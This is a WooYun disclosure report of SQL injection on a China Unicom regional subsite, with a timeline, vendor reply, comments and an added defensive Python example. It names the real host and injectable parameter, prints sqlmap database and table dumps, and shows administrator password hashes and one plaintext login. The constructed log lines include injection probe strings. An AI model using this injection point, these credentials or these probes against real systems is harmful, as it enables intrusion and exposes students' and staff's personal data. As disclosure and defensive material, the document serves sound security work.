
Vulnerability summary

Defect ID: wooyun-2014-061662

Title: SQL injection in a regional China Unicom subsite leaks a large volume of user information

Affected vendor: China Unicom

Author: PythonPig

Submitted: 2014-05-23 19:43

Fixed: 2014-07-07 19:43

Published: 2014-07-07 19:43

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-05-23: Details sent to the vendor, awaiting vendor handling
2014-05-28: Vendor confirmed; details visible to the vendor only
2014-06-07: Details opened to core white hats and domain experts
2014-06-17: Details opened to regular white hats
2014-06-27: Details opened to intern white hats
2014-07-07: Details opened to the public

Brief description:

A China Unicom site has SQL injection.
A user information leak, and not a small one.
I hear Unicom vulnerabilities never get a high rank. Why is that?

Detailed description:

I will not even go into the administrators' usernames and passwords, or the teachers' names, phone numbers and passwords, but an entire province's students' names, phone numbers and grades (!) cannot be left alone. These students are the future of the country, are they not?
0x01: First, the injection point: http://202.100.98.9/view.php?db=dongtai&id=5 (the id parameter is injectable)

[Screenshot: 1副本.jpg]

This site surely has other injection points as well; check it thoroughly.
0x02: A look at the databases:

available databases [10]:
[*] information_schema
[*] jxt_blog
[*] moodle
[*] mysql
[*] oscommerce
[*] sms
[*] test
[*] vtigercrm520
[*] vtigercrm530
[*] wbrick


0x03: Now the tables; there are a lot of them:

Database: vtigercrm520
[447 tables]
+-------------------------------------------+
| com_vtiger_workflow_activatedonce |
| com_vtiger_workflows |
| com_vtiger_workflows_seq |
| com_vtiger_workflowtask_queue |
| com_vtiger_workflowtasks |
| com_vtiger_workflowtasks_entitymethod |
| com_vtiger_workflowtasks_entitymethod_seq |
| com_vtiger_workflowtasks_seq |
| com_vtiger_workflowtemplates |
| vtiger_account |
| vtiger_accountbillads |
| vtiger_accountdepstatus |
| vtiger_accountownership |
| vtiger_accountrating |
| vtiger_accountregion |
| vtiger_accountscf |
| vtiger_accountshipads |
| vtiger_accounttype |
| vtiger_accounttype_seq |
| vtiger_actionmapping |
| vtiger_activity |
| vtiger_activity_reminder |
| vtiger_activity_reminder_popup |
| vtiger_activity_view |
| vtiger_activity_view_seq |
| vtiger_activitycf |
| vtiger_activityproductrel |
| vtiger_activitytype |
| vtiger_activitytype_seq |
| vtiger_activsubtype |
| vtiger_announcement |
| vtiger_assets |
| vtiger_assetscf |
| vtiger_assetstatus |
| vtiger_assetstatus_seq |
| vtiger_asterisk |
| vtiger_asteriskextensions |
| vtiger_asteriskincomingcalls |
| vtiger_asteriskincomingevents |
| vtiger_attachments |
| vtiger_attachmentsfolder |
| vtiger_attachmentsfolder_seq |
| vtiger_audit_trial |
| vtiger_blocks |
| vtiger_blocks_seq |
| vtiger_businesstype |
| vtiger_campaign |
| vtiger_campaignaccountrel |
| vtiger_campaigncontrel |
| vtiger_campaignleadrel |
| vtiger_campaignrelstatus |
| vtiger_campaignrelstatus_seq |
| vtiger_campaignscf |
| vtiger_campaignstatus |
| vtiger_campaignstatus_seq |
| vtiger_campaigntype |
| vtiger_campaigntype_seq |
| vtiger_carrier |
| vtiger_carrier_seq |
| vtiger_chat_msg |
| vtiger_chat_pchat |
| vtiger_chat_pvchat |
| vtiger_chat_users |
| vtiger_cntactivityrel |
| vtiger_competitor |
| vtiger_contactaddress |
| vtiger_contactdetails |
| vtiger_contactscf |
| vtiger_contactsubdetails |
| vtiger_contacttype |
| vtiger_contpotentialrel |
| vtiger_contract_priority |
| vtiger_contract_priority_seq |
| vtiger_contract_status |
| vtiger_contract_status_seq |
| vtiger_contract_type |
| vtiger_contract_type_seq |
| vtiger_convertleadmapping |
| vtiger_crmentity |
| vtiger_crmentity_seq |
| vtiger_crmentitynotesrel |
| vtiger_crmentityrel |
| vtiger_currencies |
| vtiger_currencies_seq |
| vtiger_currency |
| vtiger_currency_info |
| vtiger_currency_info_seq |
| vtiger_customaction |
| vtiger_customerdetails |
| vtiger_customerportal_fields |
| vtiger_customerportal_prefs |
| vtiger_customerportal_tabs |
| vtiger_customview |
| vtiger_customview_seq |
| vtiger_cvadvfilter |
| vtiger_cvcolumnlist |
| vtiger_cvstdfilter |
| vtiger_datashare_grp2grp |
| vtiger_datashare_grp2role |
| vtiger_datashare_grp2rs |
| vtiger_datashare_module_rel |
| vtiger_datashare_relatedmodule_permission |
| vtiger_datashare_relatedmodules |
| vtiger_datashare_relatedmodules_seq |
| vtiger_datashare_role2group |
| vtiger_datashare_role2role |
| vtiger_datashare_role2rs |
| vtiger_datashare_rs2grp |
| vtiger_datashare_rs2role |
| vtiger_datashare_rs2rs |
| vtiger_date_format |
| vtiger_date_format_seq |
| vtiger_dealintimation |
| vtiger_def_org_field |
| vtiger_def_org_share |
| vtiger_def_org_share_seq |
| vtiger_defaultcv |
| vtiger_downloadpurpose |
| vtiger_duration_minutes |
| vtiger_duration_minutes_seq |
| vtiger_durationhrs |
| vtiger_durationmins |
| vtiger_email_access |
| vtiger_email_track |
| vtiger_emaildetails |
| vtiger_emailtemplates |
| vtiger_emailtemplates_seq |
| vtiger_entityname |
| vtiger_evaluationstatus |
| vtiger_eventhandler_module |
| vtiger_eventhandler_module_seq |
| vtiger_eventhandlers |
| vtiger_eventhandlers_seq |
| vtiger_eventstatus |
| vtiger_eventstatus_seq |
| vtiger_expectedresponse |
| vtiger_expectedresponse_seq |
| vtiger_faq |
| vtiger_faqcategories |
| vtiger_faqcategories_seq |
| vtiger_faqcomments |
| vtiger_faqstatus |
| vtiger_faqstatus_seq |
| vtiger_field |
| vtiger_field_seq |
| vtiger_fieldformulas |
| vtiger_fieldmodulerel |
| vtiger_files |
| vtiger_freetagged_objects |
| vtiger_freetags |
| vtiger_freetags_seq |
| vtiger_glacct |
| vtiger_glacct_seq |
| vtiger_group2grouprel |
| vtiger_group2role |
| vtiger_group2rs |
| vtiger_groups |
| vtiger_headers |
| vtiger_home_layout |
| vtiger_homedashbd |
| vtiger_homedefault |
| vtiger_homemodule |
| vtiger_homemoduleflds |
| vtiger_homerss |
| vtiger_homestuff |
| vtiger_homestuff_seq |
| vtiger_import_maps |
| vtiger_industry |
| vtiger_industry_seq |
| vtiger_inventory_tandc |
| vtiger_inventory_tandc_seq |
| vtiger_inventorynotification |
| vtiger_inventorynotification_seq |
| vtiger_inventoryproductrel |
| vtiger_inventoryshippingrel |
| vtiger_inventorysubproductrel |
| vtiger_inventorytaxinfo |
| vtiger_inventorytaxinfo_seq |
| vtiger_invitees |
| vtiger_invoice |
| vtiger_invoice_recurring_info |
| vtiger_invoicebillads |
| vtiger_invoicecf |
| vtiger_invoiceshipads |
| vtiger_invoicestatus |
| vtiger_invoicestatus_seq |
| vtiger_invoicestatushistory |
| vtiger_language |
| vtiger_language_seq |
| vtiger_lar |
| vtiger_lead_view |
| vtiger_lead_view_seq |
| vtiger_leadacctrel |
| vtiger_leadaddress |
| vtiger_leadcontrel |
| vtiger_leaddetails |
| vtiger_leadpotrel |
| vtiger_leadscf |
| vtiger_leadsource |
| vtiger_leadsource_seq |
| vtiger_leadstage |
| vtiger_leadstatus |
| vtiger_leadstatus_seq |
| vtiger_leadsubdetails |
| vtiger_licencekeystatus |
| vtiger_links |
| vtiger_links_seq |
| vtiger_loginhistory |
| vtiger_mail_accounts |
| vtiger_mailmanager_mailattachments |
| vtiger_mailmanager_mailrecord |
| vtiger_mailmanager_mailrel |
| vtiger_mailscanner |
| vtiger_mailscanner_actions |
| vtiger_mailscanner_folders |
| vtiger_mailscanner_ids |
| vtiger_mailscanner_ruleactions |
| vtiger_mailscanner_rules |
| vtiger_manufacturer |
| vtiger_manufacturer_seq |
| vtiger_mobile_alerts |
| vtiger_modcomments |
| vtiger_modcommentscf |
| vtiger_modentity_num |
| vtiger_modentity_num_seq |
| vtiger_moduleowners |
| vtiger_notebook_contents |
| vtiger_notes |
| vtiger_notescf |
| vtiger_notificationscheduler |
| vtiger_notificationscheduler_seq |
| vtiger_opportunity_type |
| vtiger_opportunity_type_seq |
| vtiger_opportunitystage |
| vtiger_org_share_action2tab |
| vtiger_org_share_action_mapping |
| vtiger_organizationdetails |
| vtiger_ownernotify |
| vtiger_parenttab |
| vtiger_parenttabrel |
| vtiger_payment_duration |
| vtiger_payment_duration_seq |
| vtiger_pbxmanager |
| vtiger_picklist |
| vtiger_picklist_seq |
| vtiger_picklistvalues_seq |
| vtiger_pobillads |
| vtiger_portal |
| vtiger_portalinfo |
| vtiger_poshipads |
| vtiger_postatus |
| vtiger_postatus_seq |
| vtiger_postatushistory |
| vtiger_potcompetitorrel |
| vtiger_potential |
| vtiger_potentialscf |
| vtiger_potstagehistory |
| vtiger_pricebook |
| vtiger_pricebookcf |
| vtiger_pricebookproductrel |
| vtiger_priority |
| vtiger_productcategory |
| vtiger_productcategory_seq |
| vtiger_productcf |
| vtiger_productcollaterals |
| vtiger_productcurrencyrel |
| vtiger_products |
| vtiger_producttaxrel |
| vtiger_profile |
| vtiger_profile2field |
| vtiger_profile2globalpermissions |
| vtiger_profile2standardpermissions |
| vtiger_profile2tab |
| vtiger_profile2utility |
| vtiger_profile_seq |
| vtiger_progress |
| vtiger_progress_seq |
| vtiger_project |
| vtiger_projectcf |
| vtiger_projectmilestone |
| vtiger_projectmilestonecf |
| vtiger_projectmilestonetype |
| vtiger_projectmilestonetype_seq |
| vtiger_projectpriority |
| vtiger_projectpriority_seq |
| vtiger_projectstatus |
| vtiger_projectstatus_seq |
| vtiger_projecttask |
| vtiger_projecttaskcf |
| vtiger_projecttaskpriority |
| vtiger_projecttaskpriority_seq |
| vtiger_projecttaskprogress |
| vtiger_projecttaskprogress_seq |
| vtiger_projecttasktype |
| vtiger_projecttasktype_seq |
| vtiger_projecttype |
| vtiger_projecttype_seq |
| vtiger_purchaseorder |
| vtiger_purchaseordercf |
| vtiger_quickview |
| vtiger_quotes |
| vtiger_quotesbillads |
| vtiger_quotescf |
| vtiger_quotesshipads |
| vtiger_quotestage |
| vtiger_quotestage_seq |
| vtiger_quotestagehistory |
| vtiger_rating |
| vtiger_rating_seq |
| vtiger_recurring_frequency |
| vtiger_recurring_frequency_seq |
| vtiger_recurringevents |
| vtiger_recurringtype |
| vtiger_recurringtype_seq |
| vtiger_relatedlists |
| vtiger_relatedlists_rb |
| vtiger_relatedlists_seq |
| vtiger_relcriteria |
| vtiger_relcriteria_grouping |
| vtiger_reminder_interval |
| vtiger_reminder_interval_seq |
| vtiger_report |
| vtiger_reportdatefilter |
| vtiger_reportfilters |
| vtiger_reportfolder |
| vtiger_reportmodules |
| vtiger_reportsharing |
| vtiger_reportsortcol |
| vtiger_reportsummary |
| vtiger_revenuetype |
| vtiger_role |
| vtiger_role2picklist |
| vtiger_role2profile |
| vtiger_role_seq |
| vtiger_rss |
| vtiger_sales_stage |
| vtiger_sales_stage_seq |
| vtiger_salesmanactivityrel |
| vtiger_salesmanattachmentsrel |
| vtiger_salesmanticketrel |
| vtiger_salesorder |
| vtiger_salesordercf |
| vtiger_salutationtype |
| vtiger_salutationtype_seq |
| vtiger_seactivityrel |
| vtiger_seactivityrel_seq |
| vtiger_seattachmentsrel |
| vtiger_selectcolumn |
| vtiger_selectquery |
| vtiger_selectquery_seq |
| vtiger_senotesrel |
| vtiger_seproductsrel |
| vtiger_service |
| vtiger_service_usageunit |
| vtiger_service_usageunit_seq |
| vtiger_servicecategory |
| vtiger_servicecategory_seq |
| vtiger_servicecf |
| vtiger_servicecontracts |
| vtiger_servicecontractscf |
| vtiger_seticketsrel |
| vtiger_settings_blocks |
| vtiger_settings_blocks_seq |
| vtiger_settings_field |
| vtiger_settings_field_seq |
| vtiger_sharedcalendar |
| vtiger_shippingtaxinfo |
| vtiger_shippingtaxinfo_seq |
| vtiger_smsnotifier |
| vtiger_smsnotifier_servers |
| vtiger_smsnotifier_status |
| vtiger_smsnotifiercf |
| vtiger_soapservice |
| vtiger_sobillads |
| vtiger_soshipads |
| vtiger_sostatus |
| vtiger_sostatus_seq |
| vtiger_sostatushistory |
| vtiger_status |
| vtiger_status_seq |
| vtiger_systems |
| vtiger_tab |
| vtiger_tab_info |
| vtiger_taskpriority |
| vtiger_taskpriority_seq |
| vtiger_taskstatus |
| vtiger_taskstatus_seq |
| vtiger_taxclass |
| vtiger_taxclass_seq |
| vtiger_ticketcategories |
| vtiger_ticketcategories_seq |
| vtiger_ticketcf |
| vtiger_ticketcomments |
| vtiger_ticketpriorities |
| vtiger_ticketpriorities_seq |
| vtiger_ticketseverities |
| vtiger_ticketseverities_seq |
| vtiger_ticketstatus |
| vtiger_ticketstatus_seq |
| vtiger_ticketstracktime |
| vtiger_tmp_read_group_rel_sharing_per |
| vtiger_tmp_read_group_sharing_per |
| vtiger_tmp_read_user_rel_sharing_per |
| vtiger_tmp_read_user_sharing_per |
| vtiger_tmp_write_group_rel_sharing_per |
| vtiger_tmp_write_group_sharing_per |
| vtiger_tmp_write_user_rel_sharing_per |
| vtiger_tmp_write_user_sharing_per |
| vtiger_tracker |
| vtiger_tracking_unit |
| vtiger_tracking_unit_seq |
| vtiger_troubletickets |
| vtiger_usageunit |
| vtiger_usageunit_seq |
| vtiger_user2mergefields |
| vtiger_user2role |
| vtiger_user_module_preferences |
| vtiger_users |
| vtiger_users2group |
| vtiger_users_last_import |
| vtiger_users_seq |
| vtiger_usertype |
| vtiger_vendor |
| vtiger_vendorcf |
| vtiger_vendorcontactrel |
| vtiger_version |
| vtiger_version_seq |
| vtiger_visibility |
| vtiger_visibility_seq |
| vtiger_wordtemplates |
| vtiger_ws_entity |
| vtiger_ws_entity_fieldtype |
| vtiger_ws_entity_fieldtype_seq |
| vtiger_ws_entity_name |
| vtiger_ws_entity_referencetype |
| vtiger_ws_entity_seq |
| vtiger_ws_entity_tables |
| vtiger_ws_fieldtype |
| vtiger_ws_operation |
| vtiger_ws_operation_parameters |
| vtiger_ws_operation_seq |
| vtiger_ws_referencetype |
| vtiger_ws_userauthtoken |
| vtiger_wsapp |
| vtiger_wsapp_handlerdetails |
| vtiger_wsapp_queuerecords |
| vtiger_wsapp_recordmapping |
+-------------------------------------------+


Database: oscommerce
[50 tables]
+---------------------------------------------+
| action_recorder |
| address_book |
| address_format |
| administrators |
| banners |
| banners_history |
| categories |
| categories_description |
| configuration |
| configuration_group |
| counter |
| counter_history |
| countries |
| currencies |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_info |
| geo_zones |
| languages |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_description |
| products_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_to_categories |
| reviews |
| reviews_description |
| sec_directory_whitelist |
| sessions |
| specials |
| tax_class |
| tax_rates |
| whos_online |
| zones |
| zones_to_geo_zones |
+---------------------------------------------+


Database: jxt_blog
[20 tables]
+--------------------------------+
| jxt_nucleus_actionlog |
| jxt_nucleus_activation |
| jxt_nucleus_ban |
| jxt_nucleus_blog |
| jxt_nucleus_category |
| jxt_nucleus_comment |
| jxt_nucleus_config |
| jxt_nucleus_item |
| jxt_nucleus_karma |
| jxt_nucleus_member |
| jxt_nucleus_plugin |
| jxt_nucleus_plugin_event |
| jxt_nucleus_plugin_option |
| jxt_nucleus_plugin_option_desc |
| jxt_nucleus_skin |
| jxt_nucleus_skin_desc |
| jxt_nucleus_team |
| jxt_nucleus_template |
| jxt_nucleus_template_desc |
| jxt_nucleus_tickets |
+--------------------------------+


0x04: Now the administrators:

Table: administrators
[1 entry]
+----+-----------+------------------------------------+
| id | user_name | user_password |
+----+-----------+------------------------------------+
| 1 | admin | $P$DwG9Szvlf7pcTXpfMz5sL6RamdMzar/ |
+----+-----------+------------------------------------+


Database: oscommerce
Table: administrators
[1 entry]
+----+-----------+------------------------------------+
| id | user_name | user_password |
+----+-----------+------------------------------------+
| 1 | admin | $P$DwG9Szvlf7pcTXpfMz5sL6RamdMzar/ |
+----+-----------+------------------------------------+

ad_admin
[1 entry]
+----+--------+----------+
| id | user | password |
+----+--------+----------+
| 1 | wbrick | wbrick |
+----+--------+----------+

Database: sms
Table: oecms_admin
[1 entry]
+---------+----------------------------------+-----------+
| adminid | password | adminname |
+---------+----------------------------------+-----------+
| 1 | ae68761b5b545085e794d49979e72ca8 | lyt |
+---------+----------------------------------+-----------+


0x05: Finally, the leaked user data:

[Screenshot: 2改.jpg]

Proof of vulnerability:

See above.

Suggested fix:

Filter the input.
No information leak is a small matter; please take this seriously.
The names, phone numbers and per-subject grades of this many students across a whole province can be read at will; that is not a minor issue.
Over ten thousand tables; the data volume is not small either.
Then there are the administrators' usernames and passwords, and the teachers' names, phone numbers and passwords.
Why do Unicom vulnerabilities always get so little rank?
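The fix section above says only "filter". As an added example (not code from the report or from the affected site), the following Python shows the two controls that actually close this class of bug for a handler shaped like view.php?db=...&id=...: an allow-list for the `db` value, which selects a table and therefore can never be passed as a bound parameter, and integer validation plus parameter binding for `id`. It also carries a small access-log check that surfaces requests whose parameters fail the same rules, which is the cheapest way to notice probing of such an endpoint. The site itself is PHP on MySQL; sqlite3, the table and column names, the sample rows and the log lines here are constructed stand-ins so the example runs offline, and the same design carries over directly to PDO prepared statements.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Map of accepted `db` values to the table each one selects. Constructed
# placeholder names; the report's site has its own schema.
ALLOWED_DBS = {"dongtai": "dongtai_articles", "sms": "sms_articles"}

# An id is a positive integer of at most ten digits, nothing else.
ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")


def build_conn():
    """In-memory stand-in for the site's MySQL databases (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE dongtai_articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE sms_articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, phone TEXT);
        INSERT INTO dongtai_articles VALUES (5, 'notice 5'), (6, 'notice 6');
        INSERT INTO sms_articles VALUES (1, 'sms 1');
        INSERT INTO users VALUES (1, 'student A', '13800000000');
        """
    )
    return conn


def view_vulnerable(conn, db, id_param):
    """The pattern behind the finding: request values pasted into SQL text.
    Whatever follows the digits in `id` is executed as part of the statement,
    and `db` picks any table on the server."""
    sql = f"SELECT title FROM {db}_articles WHERE id = {id_param}"
    return [row[0] for row in conn.execute(sql)]


def view_hardened(conn, db, id_param):
    """Same feature, with the two controls the fix section needs."""
    # 1. `db` chooses an identifier, which cannot be parameter-bound, so it is
    #    looked up in a fixed allow-list and the raw value never reaches SQL.
    table = ALLOWED_DBS.get(db)
    if table is None:
        raise ValueError("unknown db")
    # 2. `id` is validated as a plain positive integer before anything else.
    if not ID_RE.match(id_param):
        raise ValueError("id is not a positive integer")
    # 3. The value is bound as a parameter; the driver treats it as data only.
    sql = f"SELECT title FROM {table} WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(id_param),))]


# Constructed access-log lines in common log format; the client address is
# from the documentation range and the timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/May/2014:19:40:01 +0800] "GET /view.php?db=dongtai&id=5 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/May/2014:19:40:03 +0800] "GET /view.php?db=dongtai&id=5%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [23/May/2014:19:40:05 +0800] "GET /view.php?db=dongtai&id=5%20AND%201%3D1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/May/2014:19:40:09 +0800] "GET /index.php HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_log_lines(lines):
    """Return log lines for view.php requests whose parameters fail the same
    rules the hardened handler enforces: a cheap detection for probing."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/view.php"):
            continue
        params = parse_qs(url.query)
        db = params.get("db", [""])[0]
        id_param = params.get("id", [""])[0]
        if db not in ALLOWED_DBS or not ID_RE.match(id_param):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    conn = build_conn()
    print(view_hardened(conn, "dongtai", "5"))
    for line in flag_log_lines(SAMPLE_LOG):
        print("suspicious:", line)
```

Rejecting a malformed id before it reaches the database is the "filter" the author asks for, but it is the parameter binding that keeps the query safe even if that validation is later loosened; the allow-list is needed separately because a table or database name cannot be bound as a parameter at all, so the only safe way to let a request choose one is to map it onto a fixed set of known names.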

Copyright notice: when reposting, please credit PythonPig@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-05-28 10:21

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Ningxia branch center for handling.

Latest status:

None yet


Comments

  1. 2014-05-23 21:13 | ( Regular white hat | Rank:1207 Vulns:104 | Legend has it that 魇 is a remarkable man, but apart from his...)

    Since it was forwarded to CNCERT, it won't be high, but it won't be too low either..

  2. 2014-05-26 13:52 | PythonPig ( Regular white hat | Rank:491 Vulns:71 | A little noob who only knows simple tools)

    @魇 I submitted a Unicom one earlier and CNCERT ignored it outright, without even an explanation~~

  3. 2014-05-28 11:21 | Mosuan ( Regular white hat | Rank:449 Vulns:175 | Retiring this account, no more showing off, goodbye kids. by Mosua...)

    @PythonPig When I think of CNVD ignoring two of my front-end vulns, I want to give them a beating

  4. 2014-05-28 11:54 | PythonPig ( Regular white hat | Rank:491 Vulns:71 | A little noob who only knows simple tools)

    @Mosuan Yeah, no idea why CNVD ignores them and then forwards them to the relevant unit anyway~~

  5. 2014-07-07 21:36 | 阿萨帝 ( Intern white hat | Rank:91 Vulns:68 | Asking for contact details without sending a gift is just hooliganism.)

    What tool is this?

  6. 2014-07-07 23:04 | 我是白帽子 ( Passer-by | Rank:10 Vulns:1 | I am a white hat)

    @阿萨帝 sqlmap